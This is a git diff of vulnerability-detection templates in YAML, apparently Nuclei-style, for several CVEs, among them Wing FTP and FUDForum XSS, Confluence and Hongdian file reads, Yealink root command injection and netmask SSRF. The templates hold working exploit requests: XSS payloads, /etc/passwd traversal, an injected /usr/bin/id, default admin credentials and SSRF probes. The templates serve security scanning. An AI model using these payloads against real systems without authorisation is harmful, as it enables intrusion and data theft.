"root:[x*]:0:0" - - type: status status: - 200 -# digest: 490a004630440220359e5223f0075a53d6563ae10de348408e8bce1d5e896363b3d4da09df30d1cc022042bd0751e0bc5d336755989f45d3dde01d88816b459e683e1a45bf290b910ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/07/15 diff --git a/poc/cve/CVE-2020-27735.yaml b/poc/cve/CVE-2020-27735.yaml index 0d82b84cf7..c21d20e924 100644 --- a/poc/cve/CVE-2020-27735.yaml +++ b/poc/cve/CVE-2020-27735.yaml @@ -1,49 +1,36 @@ -id: CVE-2020-27735 - -info: - name: Wing FTP 6.4.4 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. - remediation: | - Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://www.wftpserver.com/serverhistory.htm - - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-27735 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-27735 - cwe-id: CWE-79 - epss-score: 0.00216 - epss-percentile: 0.59497 - cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: wftpserver - product: wing_ftp_server - tags: cve,cve2020,xss,wing-ftp - -http: - - method: GET - path: - - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"]}' + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by cs 06/21/2022 +# digest: 490a004630440220178100e041c53995fa4f17cc62e294cbee55bd22e1ee2145698eda13ac63cc7a02203ac6bf2f46cada4604113cc871b16b8c7b97c85a716678fc47d6f2385c057724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-25112.yaml b/poc/cve/CVE-2021-25112.yaml index d26455b311..8da07378c7 100644 --- a/poc/cve/CVE-2021-25112.yaml +++ b/poc/cve/CVE-2021-25112.yaml @@ -1,20 +1,33 @@ id: CVE-2021-25112 + info: - name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS - author: DhiyaneshDK + name: WordPress WHMCS Bridge <6.4b - Cross-Site Scripting + author: dhiyaneshDk severity: medium description: | - The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting + WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard. + remediation: | + Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + - https://plugins.trac.wordpress.org/changeset/2659751 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25112 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-25112 cwe-id: CWE-79 -requests: + epss-score: 0.001 + epss-percentile: 0.41034 + cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: i-plugins + product: whmcs_bridge + framework: wordpress + tags: whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,17 +40,20 @@ requests: - | GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true + matchers-condition: and matchers: - type: word part: body words: - - "" + - "" + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a0047304502204157a558f83ea3fb9c716eaff70338138d192142cd094fdf51503b2dfdf22b97022100e272c6339af42d1b5f963685ffa7632bc9a3b39feb79acdfb2d52827604b0231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-25118.yaml b/poc/cve/CVE-2021-25118.yaml index f037f16c59..93fa616ed1 100644 --- a/poc/cve/CVE-2021-25118.yaml +++ b/poc/cve/CVE-2021-25118.yaml @@ -1,39 +1,54 @@ id: CVE-2021-25118 + info: - name: Yoast SEO < 17.3 - Path Disclosure + name: Yoast SEO 16.7-17.2 - Information Disclosure author: DhiyaneshDK severity: medium - description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + remediation: Fixed in version 17.3. reference: - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 - https://plugins.trac.wordpress.org/changeset/2608691 - remediation: Fixed in version 17.3 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-25118 cwe-id: CWE-200 - tags: wordpress,cve2021,wp-plugin,fpd,cve,wp -requests: + epss-score: 0.00155 + epss-percentile: 0.51839 + cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: yoast + product: yoast_seo + framework: wordpress + tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp + +http: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" + matchers-condition: and matchers: - - type: regex - regex: - - '"path":"(.*)/wp-content\\(.*)","size' - type: word part: header words: - "application/json" + + - type: regex + regex: + - '"path":"(.*)/wp-content\\(.*)","size' + - type: status status: - 200 + extractors: - type: regex - part: body group: 1 regex: - '"path":"(.*)/wp-content\\(.*)","size' + part: body +# digest: 4a0a00473045022040802fa6e5d672517b289ec0f5e1f88b5a6a41252698324c1b2bfb835c07b21b022100abfd5dd1973ff76a497fd60ca24218bd80f24fb549131b1214fb3c1e096e2741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-26085.yaml b/poc/cve/CVE-2021-26085.yaml index f2032f23ff..35a0fae63e 100644 --- a/poc/cve/CVE-2021-26085.yaml +++ b/poc/cve/CVE-2021-26085.yaml @@ -1,34 +1,47 @@ id: CVE-2021-26085 + info: - name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085 + name: Atlassian Confluence Server - Local File Inclusion author: princechaddha severity: medium - description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. + description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint. + remediation: | + Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - https://jira.atlassian.com/browse/CONFSERVER-67893 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26085 - cwe-id: CWE-862 + cwe-id: CWE-425 + epss-score: 0.96595 + epss-percentile: 0.99516 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: atlassian + product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2021,confluence,atlassian,lfi,kev -requests: + tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi,intrusive + +http: - method: GET path: - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - - "Confluence" - - "com.atlassian.confluence.setup.ConfluenceAppConfig" + - Confluence + - com.atlassian.confluence.setup.ConfluenceAppConfig condition: and + + - type: status + status: + - 200 +# digest: 490a0046304402205608f66fa0fffdfb3eff84f4f2cc72fbeae000d4a1beff24b6de5ce9617e6b1802201be690bfcdfa4cd01b22b872732965b3a0f232561ee9916b89f1e412436d4f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-26598.yaml b/poc/cve/CVE-2021-26598.yaml index 14c46c8ccb..e2aa82c030 100644 --- a/poc/cve/CVE-2021-26598.yaml +++ b/poc/cve/CVE-2021-26598.yaml @@ -1,33 +1,23 @@ id: CVE-2021-26598 - info: - name: ImpressCMS <1.4.3 - Incorrect Authorization + name: ImpressCMS - Incorrect Authorization author: gy741,pdteam severity: medium - description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability. + description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). reference: - https://hackerone.com/reports/1081137 - http://karmainsecurity.com/KIS-2022-03 - https://github.com/ImpressCMS - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 + metadata: + shodan-query: http.html:"ImpressCMS" + tags: cve,cve2021,impresscms,unauth,cms classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2021-26598 cwe-id: CWE-287 - epss-score: 0.00506 - epss-percentile: 0.73807 - cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: impresscms - product: impresscms - shodan-query: http.html:"ImpressCMS" - tags: hackerone,cve,cve2021,impresscms,unauth,cms - -http: +requests: - raw: - | GET /misc.php?action=showpopups&type=friend HTTP/1.1 @@ -37,7 +27,8 @@ http: GET /include/findusers.php?token={{token}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - + cookie-reuse: true + req-condition: true matchers-condition: and matchers: - type: word @@ -47,17 +38,14 @@ http: - 'user_regdate' - 'uname' condition: and - - type: status status: - 200 - extractors: - type: regex name: token + internal: true group: 1 regex: - "REQUEST' value='(.*?)'" - 'REQUEST" value="(.*?)"' - internal: true -# digest: 490a00463044022035d2ea3a5c334d1769f2e637835ba312fd925bea23bae3848a0e74c59db17be4022049b2bd02389cbdc4bc4e525235ec92878012a044788d75b00e6fdc846d2ee9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-27519.yaml b/poc/cve/CVE-2021-27519.yaml index b2810d0ffd..97b1350cae 100644 --- a/poc/cve/CVE-2021-27519.yaml +++ b/poc/cve/CVE-2021-27519.yaml @@ -1,52 +1,38 @@ id: CVE-2021-27519 - info: - name: FUDForum 3.1.0 - Cross-Site Scripting + name: FUDForum 3.1.0 - Reflected XSS author: kh4sh3i severity: medium description: | - FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. - remediation: | - Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. + A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript reference: - https://www.exploit-db.com/exploits/49942 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - https://github.com/fudforum/FUDforum/issues/2 - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-27519 cwe-id: CWE-79 - epss-score: 0.00189 - epss-percentile: 0.56336 - cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: fudforum - product: fudforum shodan-query: 'http.html:"Powered by: FUDforum"' - tags: xss,fudforum,edb,packetstorm,cve,cve2021 - -http: + verified: "true" + tags: cve,cve2021,xss,fudforum +requests: - method: GET path: - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - matchers-condition: and matchers: - type: word part: body words: - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a004630440220084f6621eba790d31297e5e928924893d763e357dc29af702e750cbd5d56d359022050642b7feff352e1dab8869ce964e29daa409b039e679dcfdcc868159ce69a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-27561.yaml b/poc/cve/CVE-2021-27561.yaml index 80ea67d3c3..43fc56b7dd 100644 --- a/poc/cve/CVE-2021-27561.yaml +++ b/poc/cve/CVE-2021-27561.yaml @@ -5,6 +5,8 @@ info: author: shifacyclewala,hackergautam severity: critical description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. + remediation: | + Update to the latest firmware version provided by the vendor to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 @@ -13,10 +15,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27561 - cwe-id: CWE-77 + cwe-id: CWE-78 + epss-score: 0.97456 + epss-percentile: 0.9995 + cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: yealink + product: device_management tags: cve,cve2021,rce,yealink,mirai,kev -requests: +http: - method: GET path: - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;" @@ -24,12 +33,12 @@ requests: matchers-condition: and matchers: - type: word - condition: and part: body words: - 'uid' - 'gid' - 'groups' + condition: and - type: word part: header @@ -44,5 +53,4 @@ requests: - type: regex regex: - "(u|g)id=.*" - -# Enhanced by mp on 2022/05/17 +# digest: 4a0a00473045022100d136052c57fae8c1d196da8a3b7604b75f18abb7f8264d25a9e076a0de2eca2a02201f43855f21480b178e19fe9dbc464e92badcc2bbee44b4112a3d4148b21fc30c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-27748.yaml b/poc/cve/CVE-2021-27748.yaml index 23f9aef7c7..90316ed9a6 100644 --- a/poc/cve/CVE-2021-27748.yaml +++ b/poc/cve/CVE-2021-27748.yaml @@ -1,33 +1,43 @@ id: CVE-2021-27748 + info: name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery author: pdteam severity: high description: | - IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers. + IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. + remediation: | + Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. reference: - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 + - hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268 classification: cve-id: CVE-2021-27748 metadata: verified: true + max-request: 2 shodan-query: http.html:"IBM WebSphere Portal" tags: cve,cve2021,hcl,ibm,ssrf,websphere -requests: + +http: - method: GET path: - - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' - - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' - redirects: true + - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me' + + host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word words: - "Interactsh Server" + - type: status status: - 200 + +# digest: 4a0a0047304502200d8020b3a03e84cf3bd87a7632f865e6057f37365325c521fabb4a70dadc061d022100bddaa747926664b7fbf81cce7b87cc9d0b411c9c1a63f64776edd962f4d3d1e5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-28149.yaml b/poc/cve/CVE-2021-28149.yaml index 06724b91bc..18c48fcc12 100644 --- a/poc/cve/CVE-2021-28149.yaml +++ b/poc/cve/CVE-2021-28149.yaml @@ -1,32 +1,21 @@ id: CVE-2021-28149 - info: - name: Hongdian H8922 3.0.5 Devices - Local File Inclusion + name: Hongdian Directory Traversal author: gy741 severity: medium description: | - Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices. + Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 + - http://en.hongdian.com/Products/Details/H8922 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-28149 cwe-id: CWE-22 - epss-score: 0.06892 - epss-percentile: 0.93204 - cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: hongdian - product: h8922_firmware tags: cve,cve2021,hongdian,traversal - -http: +requests: - raw: - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 @@ -37,22 +26,18 @@ http: GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word - part: header words: - "application/octet-stream" - + part: header - type: regex - part: body regex: - "root:.*:0:0:" - "sshd:[x*]" - "root:[$]" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100e174dacb46e1f41c1520f1358b500dd517aec2455a915ad250834066edcf2a320220021274ed905c6a0bf765c9cba4d31c340a0066b81bfd4d2cf6c696c869311edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: body diff --git a/poc/cve/CVE-2021-28150.yaml b/poc/cve/CVE-2021-28150.yaml index 729503f7e2..41e5c3d5da 100644 --- a/poc/cve/CVE-2021-28150.yaml +++ b/poc/cve/CVE-2021-28150.yaml @@ -1,31 +1,19 @@ id: CVE-2021-28150 - info: - name: Hongdian H8922 3.0.5 - Information Disclosure + name: Hongdian Sensitive Information author: gy741 severity: medium - description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). + description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 + tags: cve,cve2021,hongdian,exposure classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 + cvss-score: 5.50 cve-id: CVE-2021-28150 - cwe-id: CWE-425 - epss-score: 0.00339 - epss-percentile: 0.68228 - cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: hongdian - product: h8922_firmware - tags: cve,cve2021,hongdian,exposure - -http: + cwe-id: CWE-20 +requests: - raw: - | GET /backup2.cgi HTTP/1.1 @@ -35,21 +23,17 @@ http: GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word - part: header words: - "application/octet-stream" - + part: header - type: word - part: body words: - "CLI configuration saved from vty" - "service webadmin" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100fa0bdf9201bd86e6d88f342aabae53d2b1aafa648f3e214c98a4090d5ac3a6540220673403657d2a475765c9ed5b997bfac2b54795b902694187e6872b2fc8ab680e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: body diff --git a/poc/cve/CVE-2021-28377.yaml b/poc/cve/CVE-2021-28377.yaml index d55e6fcef0..8577c9fc51 100644 --- a/poc/cve/CVE-2021-28377.yaml +++ b/poc/cve/CVE-2021-28377.yaml @@ -1,9 +1,12 @@ id: CVE-2021-28377 + info: - name: ChronoForums 2.0.11 - Directory Traversal + name: Joomla! ChronoForums 2.0.11 - Local File Inclusion author: 0x_Akoko severity: medium - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials. + description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. + remediation: | + Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability. reference: - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 @@ -12,16 +15,28 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28377 cwe-id: CWE-22 + epss-score: 0.00106 + epss-percentile: 0.43033 + cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* + metadata: + max-request: 1 + vendor: chronoengine + product: chronoforums + framework: joomla tags: cve,cve2021,chronoforums,lfi,joomla -requests: + +http: - method: GET path: - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 +# digest: 490a004630440220773ebed023413af35c4bf60b5473efea8557d6ef58070559446fed4e9cee5fb1022009582d0565e34aed0e473fa33115329edef20ef8d2dca00da3e8c384d7040517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-28918.yaml b/poc/cve/CVE-2021-28918.yaml index a28e3035b4..d77d0f20f2 100644 --- a/poc/cve/CVE-2021-28918.yaml +++ b/poc/cve/CVE-2021-28918.yaml @@ -1,27 +1,42 @@ id: CVE-2021-28918 + info: name: Netmask NPM Package - Server-Side Request Forgery author: johnjhacking severity: critical description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + remediation: | + Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability. reference: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://github.com/advisories/GHSA-pch5-whg9-qr2r - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/rs/node-netmask + - https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2021-28918 - cwe-id: CWE-20 + cwe-id: CWE-704 + epss-score: 0.02368 + epss-percentile: 0.88659 + cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* + metadata: + max-request: 3 + vendor: netmask_project + product: netmask + framework: node.js tags: cve,cve2021,npm,netmask,ssrf,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" + stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -30,8 +45,8 @@ requests: - "Apache Server Status" - "Server Version" condition: and + - type: regex regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/17 +# digest: 4a0a0047304502202491d328e3ffa58331323166e456aa5b9b96635f47069458662271a260790d28022100ac067cc4647598603ecc6d217eca1ae8825a201b8be31500b47669bf2c081e72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-29490.yaml b/poc/cve/CVE-2021-29490.yaml index b9b3a7d41b..cbd4d7446e 100644 --- a/poc/cve/CVE-2021-29490.yaml +++ b/poc/cve/CVE-2021-29490.yaml @@ -1,28 +1,41 @@ id: CVE-2021-29490 + info: - name: Jellyfin 10.7.2 SSRF + name: Jellyfin 10.7.2 - Server Side Request Forgery author: alph4byt3 severity: medium - description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + description: | + Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cve-id: CVE-2021-29490 cwe-id: CWE-918 - remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". - tags: cve,cve2021,ssrf,jellyfin -requests: + epss-score: 0.00137 + epss-percentile: 0.48968 + cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: jellyfin + product: jellyfin + shodan-query: http.title:"Jellyfin" + tags: cve,cve2021,ssrf,jellyfin,oast + +http: - method: GET path: - - "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}" - - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB" + - "{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/" + - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB" + + stop-at-first-match: true matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body words: - - "http" - -# Enhanced by cs on 2022/02/25 + - "

Interactsh Server

" +# digest: 490a0046304402205ba712405ca9bada81feb2644725cba05bf7071874f9e92e0006353494edc48a02202997f2cc41f43e5d7366478bdf939607a8d23bae2b6b0bddd61a99d5cca81310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31249.yaml b/poc/cve/CVE-2021-31249.yaml index 4e4c8cc86d..6dd6e07053 100644 --- a/poc/cve/CVE-2021-31249.yaml +++ b/poc/cve/CVE-2021-31249.yaml @@ -1,46 +1,23 @@ id: CVE-2021-31249 - info: - name: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection + name: CHIYU TCP/IP Converter devices - CRLF injection author: geeknik + description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. + reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 severity: medium - description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the vulnerability. - reference: - - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 - - 